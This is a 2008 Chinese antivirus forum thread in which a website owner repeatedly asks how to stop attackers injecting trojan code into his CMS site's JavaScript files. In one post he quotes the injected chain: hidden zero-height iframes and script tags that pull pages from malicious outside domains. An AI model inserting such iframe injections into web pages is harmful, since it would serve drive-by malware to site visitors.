瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 我的网站被挂马了,但360、KV2008和卡卡均无法查杀

1   1  /  1  页   跳转

[求助] 我的网站被挂马了,但360、KV2008和卡卡均无法查杀

收藏
dreamdee
头像
初生襁褓狮
  • 帖子:9
  • 注册: 2008-08-01
  • 来自:
发表于: 2008-08-01 09:57 | 显示全部 短消息 资料
字号: 1楼

我的网站被挂马了,但360、KV2008和卡卡均无法查杀

我的网站程序是:PowerEasy® SiteWeaver™ CMS 6.6 Build 0718

我的网站被挂马了,我在服务器上安装了360、KV2008和卡,并进行全面查杀,但都一无所获。360还开通了ARP拦截功能。打开网站首页,经常出现:http://wnhengji.cn/1.htm(这个网页地址常被添加到网站的JS文件中),http://jzm015.cn/fx.htm还有一些可疑网址在浏览器状态栏一闪而过。

在动易论坛里问了,管理员回复说,动易的程序经过测试,没有漏洞。网站程序没有漏洞,服务器可能就有问题了,我的服务器是Windows2003,技术人员尽力了,重新进行了安全设置,用360、KV2008和卡卡都查了,但均没有发现木马程序,不知木马是怎么挂到网页的。

经与服务商技术人员联系,他们尽管想办法拦截,但最多过一、二天,网站又被挂马了。请高手们帮帮忙。

如图:

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MAXTHON 2.0)
分享到:
gototop
 
dreamdee
头像
初生襁褓狮
  • 帖子:9
  • 注册: 2008-08-01
  • 来自:
发表于: 2008-08-01 15:09 | 显示全部 短消息 资料
字号: 2楼

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

瑞星技术人员在吗?怎么查杀此木马??
gototop
 
dreamdee
头像
初生襁褓狮
  • 帖子:9
  • 注册: 2008-08-01
  • 来自:
发表于: 2008-08-01 15:28 | 显示全部 短消息 资料
字号: 3楼

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

打开网站:出现
http://wnhengji.cn/1.htm 页面.

http://wnhengji.cn/1.htm 源码:
<iframe src=http://www.pdh001.cn/b11.htm width=50 height=0 border=0></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1891483.js"></script>


http://www.pdh001.cn/b11.htm
源码:
<Iframe src="http://user1.jzm016.cn/a11/fxx.htm" width=100 height=0></iframe>
<Iframe src="http://jzm015.cn/fx.htm" width=100 height=0></iframe>
<Iframe src="http://jzm015.cn/ac.htm" width=100 height=0></iframe>
<Script language="javascript" type="text/javascript" src="http://js.users.51.la/1936348.js"></script>

以下三个网页含有木马程序
http://user1.jzm016.cn/a11/fxx.htm
http://jzm015.cn/fx.htm
http://jzm015.cn/ac.htm

木马就是这样一层一层嵌进去的.
gototop
 
dreamdee
头像
初生襁褓狮
  • 帖子:9
  • 注册: 2008-08-01
  • 来自:
发表于: 2008-08-02 00:30 | 显示全部 短消息 资料
字号: 4楼

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

瑞星技术人员呢??论坛里有没有高手??
gototop
 
dreamdee
头像
初生襁褓狮
  • 帖子:9
  • 注册: 2008-08-01
  • 来自:
发表于: 2008-08-02 21:33 | 显示全部 短消息 资料
字号: 5楼

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

我的网站经常被人在JS文档中插入木马程序代码,而且不固定在某个文件,以前找到删除了木马程序代码,但现在,木马程序代码好像被加密了,出现一些看似杂乱的数字和英文字母,给查找和删除增加了麻烦.

请问,有没有什么办法阻止别人在JS文档中增加恶意代码?

注:现在将JS文档全部设置为只读,连我本人都无法修改JS文档,但那个木马程序文件还是能写入JS文档,我真不知道木马程序代码是怎么加进去的?
gototop
 
dreamdee
头像
初生襁褓狮
  • 帖子:9
  • 注册: 2008-08-01
  • 来自:
发表于: 2008-08-02 21:34 | 显示全部 短消息 资料
字号: 6楼

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

另,我的网站是动易最新版程序,问了动易管理员,说网站程序没有漏洞.
gototop
 
dreamdee
头像
初生襁褓狮
  • 帖子:9
  • 注册: 2008-08-01
  • 来自:
发表于: 2008-08-02 21:53 | 显示全部 短消息 资料
字号: 7楼

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

木马程序代码只是添加在我放置广告代码的JS文档中,如果我的广告代码不用JS文档调用,会不会阻绝别人恶意添加木马程序代码
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT